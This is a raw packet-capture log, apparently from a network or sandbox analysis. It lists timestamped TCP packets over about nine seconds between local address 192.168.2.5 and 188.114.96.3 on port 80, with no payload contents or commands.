                                                                Oct 11, 2024 01:37:32.706939936 CEST5007280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.706989050 CEST5007780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.707078934 CEST5007780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.707752943 CEST8050076188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.707806110 CEST5007680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.712548018 CEST8050077188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.738648891 CEST5007880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.743791103 CEST8050078188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:32.743881941 CEST5007880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.743936062 CEST5007880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:32.748809099 CEST8050078188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.065849066 CEST5007780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.072491884 CEST8050077188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.072546959 CEST8050077188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.073844910 CEST8050077188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.097033978 CEST5007880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.102397919 CEST8050078188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.102669001 CEST8050078188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.173094988 CEST8050077188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.208034039 CEST8050078188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.224427938 CEST5007780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.253238916 CEST5007880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.342284918 CEST8050077188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.393841028 CEST5007780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.449919939 CEST8050078188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.467705011 CEST5007880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.468489885 CEST5007980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.473442078 CEST8050078188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.473484039 CEST8050079188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.473563910 CEST5007880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.473596096 CEST5007980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.473752022 CEST5007980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.478559971 CEST8050079188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.567409992 CEST5008080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.572457075 CEST8050080188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.572551966 CEST5008080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.572628975 CEST5008080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.577449083 CEST8050080188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.831512928 CEST5007980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.837124109 CEST8050079188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.837174892 CEST8050079188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.837203979 CEST8050079188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.925352097 CEST5008080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:33.930870056 CEST8050080188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.930896044 CEST8050079188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.930912018 CEST8050080188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:33.972095966 CEST5007980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.039190054 CEST8050080188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.081445932 CEST5008080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.124502897 CEST8050079188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.125104904 CEST5008080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.130858898 CEST8050080188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.131021023 CEST5008080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.175200939 CEST5007980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.255994081 CEST5008180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.261323929 CEST8050081188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.261441946 CEST5008180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.261584044 CEST5008180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.266935110 CEST8050081188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.271308899 CEST5008280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.276849985 CEST8050082188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.276957035 CEST5008280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.277053118 CEST5008280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.282403946 CEST8050082188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.614628077 CEST5008180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.620187998 CEST8050081188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.620234966 CEST8050081188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.628381014 CEST5008280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.633819103 CEST8050082188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.633860111 CEST8050082188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.633888006 CEST8050082188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.706573009 CEST8050081188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.720623016 CEST8050082188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.753205061 CEST5008180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.768829107 CEST5008280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.893657923 CEST8050081188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.895117044 CEST5008280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.901148081 CEST8050082188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:34.901233912 CEST5008280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:34.940701962 CEST5008180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.003648996 CEST5008180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.004405975 CEST5008380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.009649038 CEST8050081188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.010027885 CEST8050083188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.010139942 CEST5008180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.010170937 CEST5008380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.010286093 CEST5008380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.015360117 CEST8050083188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.028392076 CEST5008480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.035316944 CEST8050084188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.037555933 CEST5008480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.037646055 CEST5008480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.042860985 CEST8050084188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.362782001 CEST5008380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.368153095 CEST8050083188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.368208885 CEST8050083188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.397185087 CEST5008480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.402650118 CEST8050084188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.402693033 CEST8050084188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.402720928 CEST8050084188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.453746080 CEST8050083188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.483346939 CEST8050084188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.503300905 CEST5008380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.534547091 CEST5008480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.758840084 CEST8050083188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.759321928 CEST8050084188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.759366035 CEST8050084188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.759479046 CEST5008480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.800076008 CEST5008380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.800080061 CEST5008480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.863050938 CEST5008480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.863159895 CEST5008380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.863723993 CEST5008580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.869082928 CEST8050085188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.869174957 CEST5008580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.869276047 CEST5008580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.869707108 CEST8050084188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.869770050 CEST5008480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.869980097 CEST8050083188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.870127916 CEST5008380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.874043941 CEST5008680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.875016928 CEST8050085188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.879209042 CEST8050086188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:35.879271984 CEST5008680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.879349947 CEST5008680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:35.884586096 CEST8050086188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.222024918 CEST5008580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.227530003 CEST8050085188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.227618933 CEST8050085188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.237591028 CEST5008680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.242988110 CEST8050086188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.243029118 CEST8050086188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.243057013 CEST8050086188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.312931061 CEST8050085188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.325212955 CEST8050086188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.362555981 CEST5008580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.378177881 CEST5008680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.575345039 CEST8050086188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.602415085 CEST8050085188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.628173113 CEST5008680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.643790007 CEST5008580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.700740099 CEST5008680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.700740099 CEST5008580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.701495886 CEST5008780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.706255913 CEST8050086188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.706317902 CEST5008680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.706578016 CEST8050087188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.707144022 CEST5008780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.707216024 CEST8050085188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.707216978 CEST5008780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.707451105 CEST5008580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.707458019 CEST5008880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.712255001 CEST8050087188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.712687016 CEST8050088188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:36.712762117 CEST5008880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.712845087 CEST5008880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:36.717725992 CEST8050088188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.065814972 CEST5008880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.065890074 CEST5008780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.071683884 CEST8050088188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.071732998 CEST8050088188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.071763039 CEST8050087188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.071789980 CEST8050087188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.071816921 CEST8050087188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.153772116 CEST8050087188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.154635906 CEST8050088188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.206453085 CEST5008780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.206553936 CEST5008880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.403594971 CEST8050087188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.435340881 CEST8050088188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.456406116 CEST5008780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.487531900 CEST5008880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.551134109 CEST5008880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.555183887 CEST5008980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.557055950 CEST8050088188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.557137966 CEST5008880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.560516119 CEST8050089188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.560600996 CEST5008980192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.584934950 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.590378046 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.590622902 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.590980053 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.596056938 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.660139084 CEST5009180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.665853977 CEST8050091188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.665983915 CEST5009180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.666052103 CEST5009180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.671169043 CEST8050091188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.940885067 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:37.946295023 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.946346998 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:37.946376085 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.018914938 CEST5009180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.024482012 CEST8050091188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.024532080 CEST8050091188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.065457106 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.112557888 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.137613058 CEST8050091188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.190690041 CEST5009180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.326746941 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.373322010 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.378933907 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.389740944 CEST8050091188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.440758944 CEST5009180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.473175049 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.473392010 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.478759050 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.503976107 CEST5009180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.504610062 CEST5009280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.509737968 CEST8050092188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.509812117 CEST5009280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.509898901 CEST5009280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.510178089 CEST8050091188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.510236025 CEST5009180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.515221119 CEST8050092188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.733536005 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.737071037 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.742455006 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.837546110 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.837745905 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.843292952 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.843337059 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.843364954 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.862665892 CEST5009280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:38.868117094 CEST8050092188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.868158102 CEST8050092188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:38.974814892 CEST8050092188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.018928051 CEST5009280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.114933968 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.117676973 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.123065948 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.217861891 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.219743013 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.225228071 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.225270033 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.225301027 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.230293989 CEST8050092188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.284394979 CEST5009280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.347292900 CEST5009280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.348092079 CEST5009380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.354412079 CEST8050092188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.354459047 CEST8050093188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.354506016 CEST5009280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.354684114 CEST5009380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.354685068 CEST5009380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.361035109 CEST8050093188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.490386009 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.534507990 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.626530886 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.629101038 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.634809971 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.706512928 CEST5009380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.712085962 CEST8050093188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.712151051 CEST8050093188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.729310989 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.732786894 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:39.738178968 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.738219023 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.738248110 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.807230949 CEST8050093188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:39.862843037 CEST5009380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.036329985 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.057351112 CEST8050093188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.081475019 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.112708092 CEST5009380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.217535019 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.217557907 CEST5009380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.220685005 CEST5009480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.223463058 CEST8050090188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.223583937 CEST5009080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.224010944 CEST8050093188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.224217892 CEST5009380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.225997925 CEST8050094188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.229450941 CEST5009480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.229541063 CEST5009480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.234595060 CEST8050094188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.242620945 CEST5009580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.247983932 CEST8050095188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.248059034 CEST5009580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.248159885 CEST5009580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.253354073 CEST8050095188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.581382990 CEST5009480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.586925983 CEST8050094188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.587311983 CEST8050094188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.596904993 CEST5009580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.602555037 CEST8050095188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.602598906 CEST8050095188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.602627039 CEST8050095188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.725914001 CEST8050094188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.768867016 CEST5009480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.788904905 CEST8050095188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:40.831233025 CEST5009580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:40.978355885 CEST8050094188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.018935919 CEST5009480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.036178112 CEST8050095188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.081773043 CEST5009580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.081868887 CEST5009480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.082511902 CEST5009680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.087744951 CEST8050096188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.087810993 CEST8050095188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.087847948 CEST5009680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.087871075 CEST5009580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.087944031 CEST5009680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.087969065 CEST8050094188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.088176966 CEST5009480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.092914104 CEST8050096188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.157577038 CEST5009780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.163283110 CEST8050097188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.163433075 CEST5009780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.163533926 CEST5009780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.169305086 CEST8050097188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.440697908 CEST5009680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.446285009 CEST8050096188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.446340084 CEST8050096188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.518928051 CEST5009780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.524590969 CEST8050097188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.524642944 CEST8050097188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.524671078 CEST8050097188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.542393923 CEST8050096188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.596827984 CEST5009680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.609534979 CEST8050097188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.659503937 CEST5009780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.798135042 CEST8050096188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.846841097 CEST5009680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.853075027 CEST8050097188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.909408092 CEST5009780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.910454988 CEST5009680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.910521030 CEST5009780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.915963888 CEST5009880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.916044950 CEST8050096188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.916161060 CEST5009680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:37:41.916766882 CEST8050097188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:37:41.916858912 CEST5009780192.168.2.5188.114.96.3
